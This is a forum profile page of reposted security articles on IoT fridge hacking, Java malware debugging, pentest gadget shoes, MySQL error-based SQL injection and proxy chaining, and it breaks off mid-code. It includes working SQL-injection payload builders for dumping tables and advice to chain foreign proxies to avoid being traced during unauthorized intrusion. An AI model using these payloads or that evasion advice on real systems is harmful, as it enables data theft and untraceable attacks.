Nytro

Administrators
Everything posted by Nytro

  1. You have the code that does this here: https://github.com/NytroRST/NetRipper Read and understand.
  2. Has anyone applied to the Call for Papers/Presentations?
  3. No. You declare a pointer, an uninitialized pointer, and allocate space based on "strlen(uninitialized pointer)"? @StoneIce: char fname[35] ="Shawn Little"; NOT char* fname[35] ="Shawn Little"; char namez[50]; namez = (char*) malloc(50*sizeof(char)); It is either char namez[50] OR char *namez=(char *)malloc(...) but NOT both. Come on, C is not that complicated. Just RTFM.
  4. Finally a tutorial that people actually read. Or at least look at the pictures.
  5. Such security. Much wow. Pentest.
  6. Hacking DefCon 23’s IoT Village Samsung fridge
Posted on Tuesday, August 18th, 2015 by Pedro Venda.

As well as running the Hacking You Fat: The FitBit Aria workshop at DefCon 23’s IoT Village this year (more on that later) we also thought we’d take on their big fridge challenge: “Can you own our #IoT #Samsung - RF28HMELBSR fridge ::] @_defcon_”. As a team we’re doing more and more IoT research and hacking so this was a great opportunity to work on something we can’t get our hands on in the UK yet. It was a full-on team effort over the course of a day, so I’ve gathered everyone’s notes here.

What’s the fridge?
In the summer of last year Samsung brought out their RF28HMELBSR smart fridge, the successor to the RF4289HARS from two years previous. The fridge is part of Samsung’s line-up of Smart Home appliances which can be controlled via their Smart Home app.

Man in the middle attack
Whilst the fridge implements SSL, it FAILS to validate SSL certificates, thereby enabling man-in-the-middle attacks against most connections. This includes those made to Google's servers to download Gmail calendar information for the on-screen display. So, MITM the victim’s fridge from next door, or on the road outside, and you can potentially steal their Google credentials.

The notable exception to the rule above is when the terminal connects to the update server - we were able to isolate the URL https://www.samsungotn.net which is the same one used by TVs, etc. We generated a set of certificates with the exact same contents as those on the real website (fake server cert + fake CA signing cert) in the hope that the validation was weak, but it failed. The terminal must have a copy of the CA and is making sure that the server's cert is signed against that one. We can't hack this without access to the file system, where we could replace the CA it is validating against. Long story short, we couldn't intercept communications between the fridge terminal and the update server.

Google Calendar service
The fridge runs Google calendar, so you can set events and generally boss your family around from the fridge screen! It’s a usable feature and one that hasn’t gone without its own share of API update bugs. This should have been an excellent route to get content on to the fridge; attaching tags and more to calendar entries. However, as HTML and other mark-up is not interpreted, we couldn’t get a foothold there either.

Firmware attack
We also looked at the possibility of faking a firmware update to compromise the unit via a malicious custom update. We found the URL scheme to download the file, but we still need to find out a number of parameters to complete the URL. These are not secret things, just difficult to guess, like a code name for the model of the device, likely a serial number, etc.

TCP services and certificate challenges
The fridge's terminal has at least 2 listening services: one on port 4444 (SSL) and one on port 8888. The service on port 4444 requires a client side certificate for most requests, though not all are validated against the client side cert. We suspect this is used by the mobile app and therefore the cert must be located in the mobile app code.

The mobile app
We pulled apart the mobile app and found what we believe is the certificate inside a keystore. We “believe” we did because it has a name that suggests this. However, it is correctly passworded and we are yet to extract the password that opens the key store. We think we’ve found the password to the certificate in the client side code, but it’s obfuscated and we haven’t got round to reversing it, yet.

Conclusion
…and that's how far we got. We wanted to pull the terminal unit out of the fridge to get physical access to things like a USB port and serial or JTAG interfaces, but ran out of time. However, we still found some interesting bugs that definitely merit further investigation. The MITM alone is enough to expose a user’s Gmail creds.

The fridge STILL isn’t shipping in the UK, nor can we find any other Samsung smart fridges on the market here.

Source: http://www.pentestpartners.com/blog/hacking-defcon-23s-iot-village-samsung-fridge/
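Added example (mine, not code from the Pen Test Partners post): the two client behaviours the write-up contrasts, expressed with Python's ssl module. The permissive context is what the terminal's general connections amount to (TLS on the wire, no chain validation, so a MITM with any certificate succeeds); the verifying context is the fix; the vendor-pinned context is what the update-server client appears to do, which is why a forged chain with identical subject fields still failed. The CA file path and the fetch helper's host/port are assumptions for illustration, and the network call is not part of the test.

```python
import socket
import ssl

def permissive_client_context():
    """What the fridge terminal's general connections amount to: TLS on the wire, but the peer's
    certificate chain is never checked, so a MITM presenting any certificate is accepted."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode can become CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx

def verifying_client_context():
    """Chain validated against the platform trust store and hostname matched against the certificate."""
    return ssl.create_default_context()  # CERT_REQUIRED, check_hostname=True

def vendor_pinned_context(vendor_ca_pem):
    """What the update-server client appears to do: trust only the vendor's own CA. A forged chain
    whose subject fields copy the real one still fails, because its signing key is not that CA's.
    `vendor_ca_pem` is a path to a PEM bundle; the name is an assumption made for this example."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.verify_mode = ssl.CERT_REQUIRED
    ctx.check_hostname = True
    ctx.load_verify_locations(cafile=vendor_ca_pem)  # the platform store is deliberately not loaded
    return ctx

def accepts_forged_chain(ctx):
    """True if a handshake with an untrusted (e.g. self-signed MITM) certificate would succeed."""
    return ctx.verify_mode == ssl.CERT_NONE

def fetch_https(host, port, ctx, path="/"):
    """GET over a connection built from `ctx`. With a verifying context a MITM's forged chain raises
    ssl.SSLCertVerificationError before any data is sent; with the permissive one the request,
    credentials included, goes straight to the attacker. Needs network; not exercised by the test."""
    with socket.create_connection((host, port)) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            tls.sendall(f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode())
            return tls.recv(4096)
```

The pinned variant is also the reason the researchers' "same contents, different CA" trick failed: validation is about the signature chain ending in a trusted key, not about the fields printed in the certificate.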
  7. Native Java Bytecode Debugging without Source Code
12 Feb 2014, Jason Geffner

At CrowdStrike, we’ve seen a moderate increase in Java-based malware recently, with Remote Access Tools (RATs) like Adwind becoming increasingly prevalent. Reverse engineering Java is typically very straightforward, since excellent Java binary decompilers have existed for years. Tools like JD-GUI make Java analysis a breeze and do an excellent job at recovering Java binaries’ source code (minus the comments). In cases where we need to dynamically debug Java programs, decompiled Java can be exported from the decompiler and then imported into a Java IDE like Eclipse as part of a new Java project. This allows us to build a project using the decompiled code and then dynamically debug it through the IDE. However, this all goes out the window when dealing with Java bytecode-based obfuscation, as most Java IDEs won’t compile raw JVM instructions, nor allow you to step through these instructions without the original source code.

(Screenshots: Decompiled Non-Obfuscated Java; Decompiled Obfuscated Java)

The best solution we’ve found for debugging malware’s native Java bytecode is Dr. Garbage’s Bytecode Visualizer. We haven’t seen any thorough walkthroughs on installing and using Bytecode Visualizer, so this blog entry serves as a step-by-step guide on how to dynamically analyze native Java bytecode with Bytecode Visualizer:

1. Install the Java SE JDK
The Java Standard Edition Development Kit can be downloaded from Oracle’s website at http://www.oracle.com/technetwork/java/javase/downloads/index.html. JDK 7 is currently the latest version and can be downloaded directly from http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html. During the JDK installation, be sure to have the JDK installer install the Public JRE as well if it isn’t already installed. (Screenshot: Installation Options)

2. Install Eclipse
The Eclipse IDE for Java Developers can be downloaded from https://www.eclipse.org/downloads/packages/eclipse-ide-java-developers/keplersr1 (the download links are on the right side of the page).

3. Install Bytecode Visualizer
Run Eclipse and in the menu bar go to Help → Eclipse Marketplace… In the Search tab of the Eclipse Marketplace window, type “Dr. Garbage” into the Find textbox and press the Go button. (Screenshot: Eclipse Marketplace) Scroll to Bytecode Visualizer and press the Install button. Once installation is completed, restart Eclipse when prompted.

4. Load the JAR to be Analyzed
Once Eclipse restarts, close the Welcome tab, and in the menu bar go to File → New → Java Project. Specify any project name you like and press the Next button. (Screenshot: Create a Java Project) In the Java Settings window, click the Libraries tab. In the Libraries tab, press the Add External JARs button and select the JAR file you want to debug, thereby adding it to the Java project’s build path. (Screenshot: Java Settings) Once the JAR has been added to the build path, press the Finish button.

5. Open the JAR’s Code with Bytecode Visualizer
In the Package Explorer tab, expand your project’s Referenced Libraries to find your JAR file. Right-click on the class you want to debug and select Open with Bytecode Visualizer. (Screenshot: Open with Bytecode Visualizer)

6. Set Breakpoints
With the JAR’s code now visible in Bytecode Visualizer, you can set breakpoints by double-clicking on the vertical gray bar to the left of the disassembled Java code. (Screenshot: Setting a Breakpoint) Note that Bytecode Visualizer only allows you to set breakpoints on method entrypoints (the first instruction of a method); you can’t set breakpoints on arbitrary instructions.

7. Debugging the Disassembled Code
You can now run the disassembled code by right-clicking on the class you want to debug and choosing Debug As → Java Application. (Screenshot: Debug as Java Application) In the Debug perspective view, there are buttons to Step Into Bytecode and Step Over Bytecode (circled in red below). Use the Step Over Bytecode button to perform standard single-stepping; use the Step Into Bytecode button only to step into calls. The Debug perspective also allows you to see local variables in the Variables tab, and to add your own watches in the Expressions tab (you can add this tab via Window → Show View → Expressions in the menu bar); you can see below that I added a watch/expression for variable b. (Screenshot: Debug Perspective)

As far as we’ve seen, Bytecode Visualizer does not offer a view of the raw JVM stack, but even without it, tracing the code flow via single-stepping and examining memory with the Variables and Expressions tabs should typically allow you to successfully debug your target as needed.

For more information on Java-based malware or the adversaries using it, including detection logic or any of the adversaries tracked by CrowdStrike, please contact: intelligence@crowdstrike.com and inquire about our Intelligence subscription.

Source: http://blog.crowdstrike.com/native-java-bytecode-debugging-without-source-code/
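Added example (mine, not from the CrowdStrike post or from Bytecode Visualizer): since the debugger only breaks on method entrypoints, the first thing you want from an obfuscated class is its method list, and a decompiler is the wrong tool for that when the bytecode has been mangled. This Python script parses the class-file header and constant pool directly (the layout from the JVM specification) and lists every method as Class.name(descriptor). The sample class bytes are constructed inline (a class named `Obf` with three methods and no Code attributes, enough structure for the parser but not a loadable class); pass a real `.class` path on the command line to list its methods instead.

```python
import struct

# Constant-pool tags (JVM spec, section 4.4).
CP_UTF8, CP_INT, CP_FLOAT, CP_LONG, CP_DOUBLE = 1, 3, 4, 5, 6
CP_CLASS, CP_STRING, CP_FIELDREF, CP_METHODREF, CP_IMETHODREF, CP_NAT = 7, 8, 9, 10, 11, 12
CP_METHODHANDLE, CP_METHODTYPE, CP_INVOKEDYNAMIC = 15, 16, 18
FOUR_BYTE = {CP_INT, CP_FLOAT, CP_FIELDREF, CP_METHODREF, CP_IMETHODREF, CP_NAT, CP_INVOKEDYNAMIC}

def _u2(b, o): return struct.unpack_from(">H", b, o)[0], o + 2
def _u4(b, o): return struct.unpack_from(">I", b, o)[0], o + 4

def _skip_attributes(data, o):
    n, o = _u2(data, o)
    for _ in range(n):
        length, o = _u4(data, o + 2)            # skip attribute_name_index, read attribute_length
        o += length
    return o

def _skip_members(data, o):                     # fields (or methods) we do not need
    n, o = _u2(data, o)
    for _ in range(n):
        o = _skip_attributes(data, o + 6)       # access_flags, name_index, descriptor_index
    return o

def parse_class(data):
    """Return class name, (major, minor) version and [(method name, descriptor, access flags)]."""
    magic, o = _u4(data, 0)
    if magic != 0xCAFEBABE:
        raise ValueError("not a class file")
    minor, o = _u2(data, o)
    major, o = _u2(data, o)
    cp_count, o = _u2(data, o)
    cp = [None] * cp_count                      # slot 0 is unused by design
    i = 1
    while i < cp_count:
        tag, o = data[o], o + 1
        if tag == CP_UTF8:
            n, o = _u2(data, o)
            cp[i] = data[o:o + n].decode("utf-8", "replace"); o += n
        elif tag in FOUR_BYTE:
            o += 4
        elif tag in (CP_LONG, CP_DOUBLE):
            o += 8; i += 1                      # 8-byte constants occupy two slots
        elif tag in (CP_CLASS, CP_STRING, CP_METHODTYPE):
            cp[i], o = _u2(data, o)             # index of a Utf8 entry
        elif tag == CP_METHODHANDLE:
            o += 3
        else:
            raise ValueError(f"unknown constant pool tag {tag} at offset {o - 1}")
        i += 1
    _, o = _u2(data, o)                         # access_flags
    this_idx, o = _u2(data, o)
    _, o = _u2(data, o)                         # super_class
    n_if, o = _u2(data, o); o += 2 * n_if       # interfaces
    o = _skip_members(data, o)                  # fields
    n_methods, o = _u2(data, o)
    methods = []
    for _ in range(n_methods):
        flags, o = _u2(data, o)
        name_idx, o = _u2(data, o)
        desc_idx, o = _u2(data, o)
        o = _skip_attributes(data, o)
        methods.append((cp[name_idx], cp[desc_idx], flags))
    return {"this_class": cp[cp[this_idx]], "version": (major, minor), "methods": methods}

def method_entrypoints(data):
    """Breakpoint candidates in Bytecode Visualizer's terms: one per method, as Class.name(desc)."""
    info = parse_class(data)
    return [f"{info['this_class']}.{name}{desc}" for name, desc, _ in info["methods"]]

def build_sample_class():
    """Constructed input: class 'Obf' with <init>()V, a(I)I and b(I)I, no Code attributes."""
    utf8 = lambda s: b"\x01" + struct.pack(">H", len(s)) + s.encode()
    klass = lambda idx: b"\x07" + struct.pack(">H", idx)
    pool = [utf8("Obf"), klass(1), utf8("java/lang/Object"), klass(3),   # slots 1-4
            utf8("<init>"), utf8("()V"), utf8("a"), utf8("(I)I"),       # slots 5-8
            b"\x05" + struct.pack(">q", 42), utf8("b")]                # slots 9-10 (Long), 11
    out = struct.pack(">IHHH", 0xCAFEBABE, 0, 50, 12) + b"".join(pool)  # cp_count = slots + 1
    out += struct.pack(">HHHHH", 0x0021, 2, 4, 0, 0)     # flags, this, super, 0 interfaces, 0 fields
    out += struct.pack(">H", 3)
    out += struct.pack(">HHHH", 0x0001, 5, 6, 0)         # public <init>()V, no attributes
    out += struct.pack(">HHHH", 0x000A, 7, 8, 0)         # private static a(I)I
    out += struct.pack(">HHHH", 0x0002, 11, 8, 0)        # private b(I)I
    return out + struct.pack(">H", 0)                    # no class attributes

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_class()
    print("\n".join(method_entrypoints(blob)))
```

With a JDK installed, `javap -c -p Foo.class` gives the same listing plus the instructions; the point of doing it by hand is that the structure survives any name obfuscation, so this is a reliable inventory of where breakpoints can go before opening the class in the IDE.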
  8. By SexyCyborg

I’ve been watching the TV show "Mr. Robot" and while I know not all of it is accurate some of it is and it got me curious. I’m already pretty comfortable with command line and remote server administration from my web development work, and it turns out a lot of ‘hacking’ tools are just testing tools any sensible IT professional would use- just without a GUI. So I spent this month hitting the books (well web pages), watching lots of videos and learning a bit about information security and penetration testing (I wonder how many idiot jokes that phrase is going to cause…). I still don’t know much, but I know a tiny bit more than I did. Enough to ask people who know more than me the right questions- and enough for a fun project.

So I got to thinking- if I had to do penetration testing on a corporate facility, how would I do it? Social engineering for one- I’m a natural honeypot. I think there's a reasonable chance that a guy might invite me back to their office after a few drinks in the neighborhood? But a handbag would be suspicious and leaving cell phones at the gate would be standard practice in any reasonably secure facility. My typical clothing does not leave room to hide anything- but that’s all the more reason they would not be suspicious of me.

So I devised the Wu Ying Shoes! - Penetration Testing Platform Heels! "Wu Ying" means “shadowless"; the name is from the folk hero Wong Fei Hung’s famous "shadowless kick". Wong Fei Hung is from Foshan, which is my ancestral home as well as the ancestral home of Bruce Lee. As legend has it, to execute the "shadowless kick" Wong would distract his opponent with a punch or upper body move while striking with his foot. With my shadowless shoes I distract the target with my…upper body and they don’t see the real danger on my feet:-) Also I get tired of English names for everything. If we are ever going to stop copying Western things we should stop copying Western names as well, right? So "Wu Ying Shoes".

Each shoe has a drawer that can be slid out without my having to take the shoes off. This drawer can be customized for various payloads. (Just FYI- of course I asked the staff for spray and a cloth to wipe off the table carefully after I took these pictures.)

For the purposes of this first test version, my right shoe contains a pen testing drop box. This is a wireless router running OpenWRT with a built-in rechargeable battery that could either be left running inside the shoe (for war-walking, wifi sniffing and logging etc) or could be removed and plugged into a convenient open network jack as soon as I was inside and had direct access to the LAN. Once this is done you can gain remote access anytime you want via SSH tunnel. Installing OpenWRT on the TL-MR10U is just like upgrading the firmware on any router. It’s two links and a button- nothing to it. There’s a lot of different software you can run once you have OpenWRT flashed. This router may-or-may-not be running a custom version of Wispi for the TP-Link TL-MR10U, because if it was it would probably be illegal in China, so maybe it's not. But if it was I could run Jasager/Karma, which lets you fake being a friendly/known wifi access point and set up a fake login page to capture passwords, among other cool tricks. Wispi also has a few other handy utilities that you should never use in the real world but are pretty cool to try at home once or twice just so you know how.

In my left shoe there is a USB keystroke recorder. This is a pass-through device that goes into the back of the computer where you normally plug the keyboard in and records everything typed on the keyboard (so all passwords) in its built-in memory. A retractable ethernet cable for the OpenWRT router. A shim for opening padlocks. …and a basic lock pick set for gaining access to network cabinets, file drawers etc. I learned how to use the picks at a Locksport meet-up. I can only do simple locks but still loads of fun! Like little metal puzzles...

Here’s the model I made for 3D printing. I’m sticking with TinkerCAD just to annoy all the CAD snobs who keep commenting on it ;-P I had to print it at 0.3mm so the layers are a little coarse. It was taking forever at 0.2mm (what I did my LED skirt control box at). Still looks decent. That’s PLA plastic. Infill is 20% and it supports my weight without any issues. Each shoe weighs about the same as a normal, non-printed shoe. Obligatory denim overalls work-clothes shot for the boys. You know the world is a strange place when fan-service is overalls and the slutty mini-dress is “meh". Removing the support structure. This kind of 3D printer can’t really do an overhang over 45° or so since each layer has to rest on the one below. Sacrificial columns are printed to support the overhang for printing and then peeled away afterwards. Source files are here if you'd like to make your own: http://www.thingiverse.com/thing:980191

LibraryBox can be a good way to share movies and ebooks with friends if you are traveling or don’t have wifi. I could see Piratebox being useful in time of disaster for sharing information when the wireless networks are down. It’s kind of like a mini-NAS. Wispi and pentest drop boxes should of course only be experimented with at home for educational purposes. While it’s good to know about this stuff, always obey your local laws. People think all sorts of crazy stuff about China and I don’t want to talk politics- but my city Shenzhen is a really, really cool place to live (think Bladerunner) so there’s really no reason to do dumb stuff.

As always- thanks to my friends for helping to clean up my English above. I had a ton of technical help but I follow a strict “don’t do it for me, show me how” rule so learned a tremendous amount. As I’ve also mentioned before, I’m not much more technical than my female friends but I am patient, good at following tutorials and asking questions. If you can follow a recipe I assure you that you could do this sort of thing also. Any women with questions about teaching themselves online should feel free to contact me on Reddit and I’d be delighted to offer any help I can. Remember ladies- if you are thinking about becoming a Maker, learning to code or doing hardware; if a girl who looks like me can do it, how hard can it really be?

Edit: Normally I have to sort through about 50% identical replies to my posts on Reddit. For those flexing their fingers and getting ready to give me a hard time: Yes, they are fake. Yes, I feature them prominently and deliberately in everything I do. No, most of my projects do not have all that much technical merit- they are 90% silicone and 10% silicon ;-) No, if you point out the absolutely obvious no one will think you are insightful, edgy or cool. They will think you are 12.

Source: http://imgur.com/a/c4WNF#PEc4q1x
  9. MySQL Error Based SQL Injection Using EXP
Table of Contents:
  • Overview
  • Injection
  • Extracting Data
  • Dump In One Shot
  • Reading Files
  • Injection in Insert
  • Injection in Update
  • Injection in Delete
  • Conclusion
  • References
Download: https://www.exploit-db.com/docs/37953.pdf
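Added example (mine, not code from the paper): the mechanics behind the "Injection", "Extracting Data" and "Dump In One Shot" sections. `exp()` of the bitwise NOT of a subquery result overflows DOUBLE, and on the MySQL builds the paper targets the resulting out-of-range error echoes the evaluated expression, subquery result included. The payload builders produce that expression; the extractor pulls the leaked value back out of the error text. The two sample error responses are constructed for this example, in the message shape the technique relies on; the table and column names are placeholders.

```python
import re

def exp_payload(subquery):
    """Error-based extraction: exp(~x) overflows DOUBLE, and the out-of-range error message echoes
    the evaluated expression, which now contains the subquery's result."""
    return f"exp(~(select * from (select {subquery})x))"

def one_shot_dump_payload(table, columns):
    """'Dump in one shot': fold a whole table into one string with group_concat/concat_ws
    (rows separated by ',', columns by ':'), leaked through a single error."""
    return exp_payload(f"group_concat(concat_ws(0x3a,{','.join(columns)})) from {table}")

# Shape of the server error the technique depends on:
#   DOUBLE value is out of range in 'exp(~((select 'LEAKED' from dual)))'
ERROR_RE = re.compile(r"DOUBLE value is out of range in 'exp\(~\(\(select '(.*)' from dual\)\)\)'")

def extract_from_error(message):
    """Pull the leaked value out of the error text; None if the response carries no such error."""
    m = ERROR_RE.search(message)
    return m.group(1) if m else None

def split_dump(leaked):
    """Turn a group_concat/concat_ws dump back into rows of columns."""
    return [tuple(row.split(":")) for row in leaked.split(",") if row]

# Constructed responses standing in for the application's error page.
SAMPLE_VERSION_ERROR = ("ERROR 1690 (22003): DOUBLE value is out of range in "
                        "'exp(~((select '5.5.44-0ubuntu0.14.04.1' from dual)))'")
SAMPLE_DUMP_ERROR = ("DOUBLE value is out of range in 'exp(~((select "
                     "'admin:5f4dcc3b5aa765d61d8327deb882cf99,bob:e10adc3949ba59abbe56e057f20f883e' "
                     "from dual)))'")

if __name__ == "__main__":
    print(exp_payload("version()"))
    print(one_shot_dump_payload("users", ["user", "password"]))
    print(extract_from_error(SAMPLE_VERSION_ERROR))
    for row in split_dump(extract_from_error(SAMPLE_DUMP_ERROR)):
        print(row)
```

Two caveats a practitioner will hit: the one-shot dump is capped by `group_concat_max_len` (1024 bytes by default, so large tables need paging or a session variable the injection cannot set), and the whole technique depends on the server still echoing the expression in the error; on builds where that was removed, the same payload is just a failed query.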
  10. The PenTesters Framework (PTF)
A TrustedSec Project - Copyright 2015
Written by: David Kennedy @hackinGDave

The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu based distributions to create a similar and familiar distribution for Penetration Testing. As pentesters, we've become accustomed to the /pentest/ directories or our own toolsets that we want to keep up-to-date all of the time. We have those "go to" tools that we use on a regular basis, and using the latest and greatest is important. PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit. We commonly see internally developed repos that you can use as well as part of this framework. It's all up to you. The ultimate goal is for community support on this project. We want new tools added to the github repository. Submit your modules. It's super simple to configure and add them and only takes a few minutes.

Source: https://github.com/trustedsec/ptf
  11. Proxy Chaining

We live in a world where privacy has an important role in our day-to-day life. The activities we perform using the Internet can tell a lot about a person’s social and professional life. In the wrong hands, this information could result in various problems. Data collected could be used to hack bank accounts, social media accounts etc. For this reason, people choose to be anonymous while using the internet, using a proxy. A proxy could be explained as a gateway between the user's computer and the destination webpage. Normally while browsing through a website, your original IP is identified by the website, which could compromise your privacy. By the use of proxy chaining we bounce through a number of proxy servers and reach the destination.

While using a proxy server you are not directly connected to the website. The proxy connects to the website and creates a cached version of the site and sends it to you, like a photocopy. If a proxy visits a website, then the page is cached in the proxy server. The next time someone visits the page, the proxy server loads from the cached page. This speeds up the process to an extent. If you check the IP that’s connected to the internet, it will be the ISP IP. But when using a proxy server and chaining, the IP displayed will be the last used proxy server’s IP in the chain.

User ———-> Proxy ———–> Webpage

Proxy chaining is connecting two or more proxy servers to obtain the intended page. We can use as many proxies as we want. Let’s see an example as shown below:

User ———–> Proxy1 ———–> Proxy2 ———–> Proxy3 ———–> Proxy4 ———–> Webpage

The user connects to Proxy1 and from there to the next proxies as specified by the user until it finally reaches the destination. When the destination end searches for the IP, the Proxy4 IP is displayed as the user’s IP. While using proxy chaining we have to make sure that all the proxy servers included in the chain are working properly. If any proxy IP fails to work, this means the connection can’t be established. Then we have to replace the damaged proxy with a new one or exclude the damaged IP and connect the rest, forming a new chain. Sometimes it can be a bit difficult to figure out which proxy has malfunctioned, if you are using too many proxies.

Proxy chaining is also used while carrying out an attack. It is a must if you are attempting to gain unauthorized access to any server. Even if you use proxy chaining you can’t be 100% anonymous. You could be traced on the basis of each proxy used to establish a connection. It just makes it a lot harder to track. If you use foreign proxies, then it will be more complicated to find someone. Tracking could be done only by collecting the logs of each proxy used from the administrator. This could take a lot of time if we use a foreign proxy. As time passes, it becomes more difficult to track a person. Administrators delete the logs after a certain period of time. Once the log is gone, it’s just impossible to track the IP back. So while hacking, it’s advised to use at least 5 foreign proxies in a chain.

One of the main factors that needs to be taken into consideration when using proxy chaining is the connection speed. Each server might have a different connection speed and lag according to its configuration. So during chaining there may be a chance of a slow net speed due to lag in each server. The total lag while connecting to a page could be said to be the sum of the individual lags at each server. This gets worse if we are using a larger number of proxies in the chain.

Browser Chaining

Browser chaining is an easy process. We make use of the browser for chaining proxies. This will work only for the requests made through the browser. Let’s see how this can be done using the Internet Explorer browser. First, open the browser and go to “Internet options” in the settings menu. A window will appear with a few tabs at the top as shown in the figure below:

Figure 1: Internet Options window in Internet Explorer.

Now, click on the Connections tab from the available tabs and select the “LAN settings” button. A small window will pop up after clicking on the LAN settings button as shown below:

Figure 2: LAN Settings window to specify proxy server details.

Check the “Use a proxy server” box in the window to type in the proxy server details in the field. If you just need to use a single proxy, then type in the IP and port number and click OK. To use proxy chaining, click on the Advanced button and type in the proxy IP followed by the port number in the box provided. Leave a space between each proxy IP. Now all the connections made from the browser are through the specified proxy servers.

There is various software that helps us carry out proxy chaining. Let’s discuss one such piece of software called “Proxifier.”

Proxifier

It’s a simple piece of software that helps us to connect to various proxy servers across the world. All we have to do is type in the proxy IP, port number, and the socket type. While making use of proxy chaining there are some points you should remember:
  • A proxy chain can contain various types of proxy servers like SOCKS v4, SOCKS v5, HTTPS etc.
  • If using an HTTP proxy, it should be placed last in the chain.
  • The entire chain will not work if one proxy goes down.
  • The total lag will be the sum of all individual lags in the chain.

Figure 3: Proxifier window

This software has a variety of functions. The connections space as shown above in Figure 3 will display all the connections established from the particular system. The total time, data exchanged etc. can be easily sorted out using this software. We can save the log according to our need. The connections made could be encrypted as per the user’s requirement, and various other options are available in this software. Click on the first icon in the panel called Proxy server configuration. A window will open up with a blank space; type in the proxy server details. You can create a number of chains and select them accordingly using this window. The window is as shown below:

Figure 4: Filling in proxy server details

The order of the chain will be as specified in the list as shown in the figure above. We can drag and change the order according to our need. There will be a check box to enable and disable each proxy in the chain. There is also a proxy checker tool integrated into this software, which is a very helpful one. Under “View” in the toolbar click on proxy checker to start checking the proxies. Some of the proxy servers available are disabled by the administrators due to various reasons. So checking the servers before connecting to the internet is a good idea. This tool could be used to check the status of the server. All we have to do is to specify the server address and the socket type with IP and click the check button. If it’s a working proxy, a message will be shown after the test that it’s ready to use with Proxifier.

TOR

Tor is a browser that helps us to browse anonymously making use of various proxy servers available. Here we cannot specify proxy servers. But the browser itself skips through a few servers which are provided by the TOR network. It helps us to reach blocked destinations or view censored content by the help of the available channels. I would not recommend TOR for extreme hacking purposes, but normal browsing could be done easily. All we have to do is to install the browser and type in the required page address. TOR’s hidden services help us to publish websites and other services without revealing the original location. Tor is mainly used against a common form of internet surveillance called “traffic analysis”. This is used to keep an eye on the activities of a public network. TOR cannot completely hide you from attackers. It protects the packets sent from your end by encrypting them and also by passing them through various channels to make it hard for others to track. However, with sophisticated tools and efforts they could find information about your identity. As the number of users in TOR increases, the number of sources and destinations in the network increases accordingly, increasing the security for everyone in the network. Some NGOs recommend their users to browse from TOR to hide their identity from the outer world. A branch of the U.S. Navy uses TOR for open source intelligence. They use TOR for visiting websites without leaving a government IP in their website log. The path selected by the browser changes from time to time. There may be various nodes in between the connection. All these connections will be encrypted in the Tor network and the connection from the last node to the destination will be open. So when the website checks its log, only the last node path will be visible, keeping the user’s privacy.

Figure 5: TOR Browser

ProxyHam

ProxyHam brings a whole new level for being anonymous. It’s a proxy device made by Ben Caudill which adds a radio connection to the user's layer giving absolute protection. This device connects to Wi-Fi and relays a user's internet connection over a 900 MHz radio connection to a faraway computer. ProxyHam has a range of about 2.5 miles (4 km approx). Even if the investigator fully traces the connection, they will only find the ProxyHam placed 4 km away from your original location. The device mainly consists of two parts. The first one consists of a Raspberry Pi computer connected to a Wi-Fi card and a small 900 MHz antenna which is to be kept at a location far away from yours. The other end consists of a 900 MHz antenna plugged into the user's Ethernet port.

Figure 6: ProxyHam

Proxy Website Service

There are various proxy websites that offer proxy services. Some of them may have a chain of servers behind and some of them just one or two. These websites are mainly used to access blocked websites or pages. Some YouTube videos are blocked in certain countries. These websites help us to view such blocked content easily. The following is a list of such websites that offer this kind of service:
  • https://www.filterbypass.me/
  • https://www.proxysite.com/
  • https://hide.me/en/proxy
  • https://kproxy.com/
  • https://zend2.com/
  • http://www.proxywebsite.org/
  • http://000freeproxy.com/
  • https://www.hidemyass.com/proxy

There are some integrated browser add-ons like anonymox that provide proxy services. They have a small window, which allows us to select from available servers so that we can connect to the destination. We cannot completely trust any such add-on. They might give a shield from normal scanning but on a thorough analysis the user IP could be easily determined. And also the number of available proxies is limited in such cases. So, this type could only be used for normal browsing purposes. The anonymox window is as shown below:

Figure 7: Anonymox window.

Conclusion

Proxy chaining is a simple but effective method to stay anonymous over the internet. Not only hackers but normal users can also make use of such services to protect their privacy over the internet. Black hat hackers make use of several tools and software to switch between the proxy servers all over the world, which makes them very hard to track. By the use of a normal browser and add-ons you won’t get much security, but to an extent these could be used for day-to-day browsing purposes. We might also consider the internet speed while using such intermediate servers. If it’s a popular website which the server has already cached, then the response time will be remarkable. These websites are loaded from the cache database. When accessing a new webpage it takes a bit to load due to the lag in the intermediate servers. Now that we know how proxy chaining works, we can carry out our activities with relative anonymity. I used “relative” because there is no way to remain completely anonymous with the NSA spying across the globe. All we can do is to make detection a bit harder using proxy chaining.

Author: Steve Lynch
Source: http://resources.infosecinstitute.com/proxy-chaining/
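Added example (mine, not from the InfoSec Institute article or from Proxifier): what a chain actually is on the wire, using SOCKS5 (RFC 1928). A chain User → Proxy1 → Proxy2 → Webpage is one TCP connection to Proxy1, a CONNECT to Proxy2 sent to Proxy1, and then a CONNECT to the webpage sent through that tunnel; each hop learns only its neighbours, and any hop that refuses kills the whole chain, which is the "one proxy down" case the article describes. The message builders and reply parser run offline; `open_chain` drives a real socket and is not part of the test. Proxy and destination addresses in the test are placeholders.

```python
import ipaddress
import socket
import struct

SOCKS5 = 0x05
REPLY = {0: "succeeded", 1: "general SOCKS server failure", 2: "connection not allowed by ruleset",
         3: "network unreachable", 4: "host unreachable", 5: "connection refused",
         6: "TTL expired", 7: "command not supported", 8: "address type not supported"}

def greeting():
    """Client hello offering one method: 0x00, no authentication."""
    return bytes([SOCKS5, 1, 0x00])

def connect_request(host, port):
    """CONNECT request (RFC 1928 section 4). A domain name is passed as-is, so resolution
    happens at the proxy and the client's resolver never leaks the destination."""
    try:
        ip = ipaddress.ip_address(host)
        addr = bytes([0x01 if ip.version == 4 else 0x04]) + ip.packed
    except ValueError:
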